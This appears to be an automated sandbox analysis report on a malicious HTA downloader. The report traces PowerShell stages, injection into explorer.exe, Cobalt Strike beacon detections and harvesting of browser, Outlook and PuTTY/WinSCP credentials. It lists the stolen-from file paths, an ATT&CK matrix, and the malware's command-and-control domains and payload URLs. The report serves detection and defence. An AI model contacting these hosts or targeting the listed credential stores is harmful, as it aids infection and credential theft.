              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\glean\events\events
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\handlers.json
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite-shm
              Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\archived\2023-10\1696499497813.5bfd2570-f400-4e52-b6dc-002ad477b461.event.jsonlz4
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\glean\pending_pings\56e3450a-57a6-47cc-8d89-0c1821e497dc
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journal
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.db
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\addonStartup.json.lz4
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\favicons.sqlite-shm
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\sessionCheckpoints.json
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite-wal
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\compatibility.ini
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\.metadata-v2
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cert9.db
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\extension-preferences.json
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\sessionstore.jsonlz4
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\times.json
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\archived\2023-10\1696499493064.1fdfcf89-70db-44d6-a79f-5e3aaf4b4005.new-profile.jsonlz4
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite-shm
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\sessionstore-backups\upgrade.jsonlz4-20230927232528
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\parent.lock
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\archived\2023-10\1696499497813.505276a1-de43-4b25-8ccd-2ecebf69eb53.health.jsonlz4
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\glean\pending_pings\ffc7ad80-9f7b-42ff-9e00-b27af7794792
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-wal
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\webappsstore.sqlite-shm
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\webappsstore.sqlite
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\prefs.js
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\targeting.snapshot.json
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\archived\2023-10\1696499493076.537c2d56-4d43-48f9-a98b-f5124a51bc81.event.jsonlz4
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\state.json
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage.sqlite
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\SiteSecurityServiceState.txt
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\glean\pending_pings\a628252e-0bd8-44c4-a914-eec0c019b5da
              Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000018.00000002.2534825073.0000000002A21000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.2534653037.0000000000141000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3108, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4072, type: MEMORYSTR
              Source: Yara matchFile source: 13.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.1778514490.0000000000DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.1779109929.0000000002791000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information111
              Scripting
              Valid Accounts11
              Native API
              111
              Scripting
              1
              DLL Side-Loading
              1
              Disable or Modify Tools
              1
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              4
              Ingress Tool Transfer
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Exploitation for Client Execution
              1
              DLL Side-Loading
              623
              Process Injection
              11
              Deobfuscate/Decode Files or Information
              11
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol1
              Data from Local System
              21
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts12
              Command and Scripting Interpreter
              Logon Script (Windows)Logon Script (Windows)2
              Obfuscated Files or Information
              1
              Credentials in Registry
              3
              File and Directory Discovery
              SMB/Windows Admin Shares11
              Email Collection
              4
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts4
              PowerShell
              Login HookLogin Hook1
              Software Packing
              NTDS128
              System Information Discovery
              Distributed Component Object Model11
              Input Capture
              115
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading
              LSA Secrets531
              Security Software Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
              Masquerading
              Cached Domain Credentials141
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
              Virtualization/Sandbox Evasion
              DCSync13
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job623
              Process Injection
              Proc Filesystem1
              Application Window Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Hidden Files and Directories
              /etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1539853 Sample: veryeasythingsevermadeforcr... Startdate: 23/10/2024 Architecture: WINDOWS Score: 100 76 prolinice.ga 2->76 78 drive.usercontent.google.com 2->78 80 drive.google.com 2->80 90 Multi AV Scanner detection for domain / URL 2->90 92 Suricata IDS alerts for network traffic 2->92 94 Found malware configuration 2->94 96 16 other signatures 2->96 14 mshta.exe 1 2->14         started        17 wihaduv 2->17         started        signatures3 process4 signatures5 144 Detected Cobalt Strike Beacon 14->144 146 Suspicious powershell command line found 14->146 148 PowerShell case anomaly found 14->148 19 powershell.exe 3 39 14->19         started        24 conhost.exe 17->24         started        process6 dnsIp7 82 172.245.135.166, 49732, 49913, 80 AS-COLOCROSSINGUS United States 19->82 68 seethebestthingsen...ewithgreatthign.vbS, Unicode 19->68 dropped 70 C:\Users\user\AppData\...\zrs0mlof.cmdline, Unicode 19->70 dropped 104 Detected Cobalt Strike Beacon 19->104 106 Suspicious powershell command line found 19->106 108 Obfuscated command line found 19->108 110 Found suspicious powershell code related to unpacking or dynamic code loading 19->110 26 wscript.exe 1 19->26         started        29 powershell.exe 21 19->29         started        31 csc.exe 3 19->31         started        34 conhost.exe 19->34         started        file8 signatures9 process10 file11 130 Detected Cobalt Strike Beacon 26->130 132 Suspicious powershell command line found 26->132 134 Wscript starts Powershell (via cmd or directly) 26->134 138 3 other signatures 26->138 36 powershell.exe 7 26->36         started        136 Loading BitLocker PowerShell Module 29->136 74 C:\Users\user\AppData\Local\...\zrs0mlof.dll, PE32 31->74 dropped 39 cvtres.exe 1 31->39         started        signatures12 process13 signatures14 98 Detected Cobalt Strike Beacon 36->98 100 Suspicious powershell command line found 36->100 102 Obfuscated command line found 36->102 41 powershell.exe 15 16 36->41         started        45 conhost.exe 36->45         started        process15 dnsIp16 86 drive.usercontent.google.com 142.250.185.193, 443, 49778 GOOGLEUS United States 41->86 88 drive.google.com 142.250.186.78, 443, 49772 GOOGLEUS United States 41->88 140 Writes to foreign memory regions 41->140 142 Injects a PE file into a foreign processes 41->142 47 aspnet_regbrowsers.exe 41->47         started        50 aspnet_regbrowsers.exe 41->50         started        signatures17 process18 signatures19 150 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 47->150 152 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 47->152 154 Maps a DLL or memory area into another process 47->154 158 2 other signatures 47->158 52 explorer.exe 47->52 injected 156 Switches to a custom stack to bypass stack traces 50->156 process20 dnsIp21 84 prolinice.ga 45.91.8.152, 49980, 49981, 80 SERV-TECHRU Russian Federation 52->84 72 C:\Users\user\AppData\Roaming\wihaduv, PE32 52->72 dropped 112 Benign windows process drops PE files 52->112 114 Injects code into the Windows Explorer (explorer.exe) 52->114 116 Writes to foreign memory regions 52->116 118 Hides that the sample has been downloaded from the Internet (zone.identifier) 52->118 57 explorer.exe 52->57         started        60 explorer.exe 52->60         started        62 explorer.exe 52->62         started        64 6 other processes 52->64 file22 signatures23 process24 signatures25 120 System process connects to network (likely due to code injection or exploit) 57->120 122 Found evasive API chain (may stop execution after checking mutex) 57->122 124 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 57->124 128 3 other signatures 57->128 126 Tries to harvest and steal browser information (history, passwords, etc) 60->126 66 WerFault.exe 64->66         started        process26

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              veryeasythingsevermadeforcreatenewthignsbetterthigns.hta18%ReversingLabsScript-WScript.Downloader.Asthma
              veryeasythingsevermadeforcreatenewthignsbetterthigns.hta28%VirustotalBrowse
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\wihaduv0%ReversingLabs
              No Antivirus matches
              SourceDetectionScannerLabelLink
              drive.google.com0%VirustotalBrowse
              prolinice.ga11%VirustotalBrowse
              drive.usercontent.google.com1%VirustotalBrowse
              SourceDetectionScannerLabelLink
              https://api.msn.com/v1/news/Feed/Windows?0%URL Reputationsafe
              https://api.msn.com/v1/news/Feed/Windows?0%URL Reputationsafe
              https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
              https://duckduckgo.com/ac/?q=0%URL Reputationsafe
              https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
              http://schemas.micro0%URL Reputationsafe
              http://go.micros0%URL Reputationsafe
              https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
              https://aka.ms/pscore6lB0%URL Reputationsafe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              https://aka.ms/winsvr-2022-pshelp0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
              https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
              http://www.microsoft.0%URL Reputationsafe
              https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
              https://www.ecosia.org/newtab/0%URL Reputationsafe
              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
              https://android.notify.windows.com/iOS0%URL Reputationsafe
              http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
              http://prolinice.ga/ndex.php1%VirustotalBrowse
              NameIPActiveMaliciousAntivirus DetectionReputation
              drive.google.com
              142.250.186.78
              truefalseunknown
              drive.usercontent.google.com
              142.250.185.193
              truefalseunknown
              prolinice.ga
              45.91.8.152
              truetrueunknown
              NameMaliciousAntivirus DetectionReputation
              http://172.245.135.166/600/seethebestthingsentiretimewithgreatthignstoebe.tIFfalse
                unknown
                http://prolinice.ga/index.phptrue
                  unknown
                  http://vilendar.ga/index.phptrue
                    unknown
                    http://172.245.135.166/600/ERFCEE.txtfalse
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 0000000E.00000000.1754609723.00000000093B4000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://duckduckgo.com/chrome_newtabexplorer.exe, 00000013.00000003.1990810221.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, 5BA1.tmp.19.drfalse
                      • URL Reputation: safe
                      unknown
                      http://wvhejqgucymxstkj.com/application/x-wwexplorer.exe, 0000000E.00000003.2161939139.0000000000978000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        http://prolinice.ga/ndex.phpexplorer.exe, 00000013.00000002.2014590049.0000000002D25000.00000004.00000020.00020000.00000000.sdmptrueunknown
                        https://duckduckgo.com/ac/?q=explorer.exe, 00000013.00000003.1990810221.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, 5BA1.tmp.19.drfalse
                        • URL Reputation: safe
                        unknown
                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                          unknown
                          https://wns.windows.com/batexplorer.exe, 0000000E.00000003.2159424837.0000000009730000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1755609685.0000000009730000.00000004.00000001.00020000.00000000.sdmpfalse
                            unknown
                            https://www.msn.com/en-us/health/wellness/7-secrets-to-a-happy-old-age-backed-by-science/ss-AA1hwpvWexplorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                              unknown
                              https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 0000000E.00000003.2158540927.0000000002FAD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1749537667.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://contoso.com/Licensepowershell.exe, 0000000A.00000002.1700233165.0000000005A69000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://172.245.135.166/600/seethebestthingsentiretimewithgreatthignstoebe.tIFApowershell.exe, 00000001.00000002.1451121837.0000000007518000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=explorer.exe, 00000013.00000003.1990810221.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, 5BA1.tmp.19.drfalse
                                • URL Reputation: safe
                                unknown
                                https://www.msn.com/en-us/news/politics/california-workers-will-get-five-sick-days-instead-of-three-explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                  unknown
                                  https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-bexplorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                    unknown
                                    http://schemas.microexplorer.exe, 0000000E.00000000.1749297588.0000000002C00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.1753289408.0000000007B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.1753243841.0000000007AF0000.00000002.00000001.00040000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgexplorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                      unknown
                                      https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                        unknown
                                        http://go.microspowershell.exe, 00000003.00000002.1326423654.0000000005779000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://wvhejqgucymxstkj.com/explorer.exe, 0000000E.00000003.2161939139.0000000000978000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppinexplorer.exe, 0000000E.00000003.2159660741.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1761907243.000000000D1B6000.00000004.00000001.00020000.00000000.sdmpfalse
                                            unknown
                                            https://drive.goopowershell.exe, 0000000A.00000002.1697699849.0000000000820000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1699464500.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1700233165.0000000004A01000.00000004.00000800.00020000.00000000.sdmptrue
                                              unknown
                                              http://172.245.135.166/600/seethebestthingsentiretimewithgreatthignstoebe.tIFtpowershell.exe, 00000001.00000002.1451121837.0000000007518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://www.msn.com/en-us/money/companies/legacy-park-auction-canceled-liquidation-proposed-here-s-wexplorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.1442591521.00000000049B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1326423654.0000000005041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2180174511.00000000052AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1700233165.0000000004A01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchexplorer.exe, 00000013.00000003.1990810221.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, 5BA1.tmp.19.drfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://contoso.com/powershell.exe, 0000000A.00000002.1700233165.0000000005A69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1448623552.0000000005A1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1328341542.00000000060AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1700233165.0000000005A69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://powerpoint.office.comcemberZexplorer.exe, 0000000E.00000003.2159660741.000000000D0B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1761907243.000000000CFF4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://drive.usercontent.google.compowershell.exe, 0000000A.00000002.1700233165.0000000004C56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://prolinice.ga/zexplorer.exe, 00000013.00000002.2014590049.0000000002D45000.00000004.00000020.00020000.00000000.sdmptrue
                                                        unknown
                                                        https://api.msn.com/Xexplorer.exe, 0000000E.00000000.1754609723.00000000093B4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://www.msn.com/en-us/news/world/pastor-of-atlanta-based-megachurch-faces-backlash-after-controvexplorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1442591521.00000000049B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1326423654.0000000005041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2180174511.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1700233165.0000000004A01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://172.245.135.166/600/seethebestthingsentiretimewithgreatthignstoebe.tIF_powershell.exe, 00000001.00000002.1441509755.0000000002FCF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://outlook.comNaP0Bexplorer.exe, 0000000E.00000003.2159660741.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1761907243.000000000D1B6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  http://www.autoitscript.com/autoit3/Jexplorer.exe, 0000000E.00000003.2159424837.00000000096A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1755609685.00000000095B9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1448623552.0000000005A1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1328341542.00000000060AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1700233165.0000000005A69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.1326423654.0000000005196000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-alexplorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoexplorer.exe, 00000013.00000003.1990810221.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, 5BA1.tmp.19.drfalse
                                                                        unknown
                                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000A.00000002.1700233165.0000000004B58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1697699849.00000000008FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
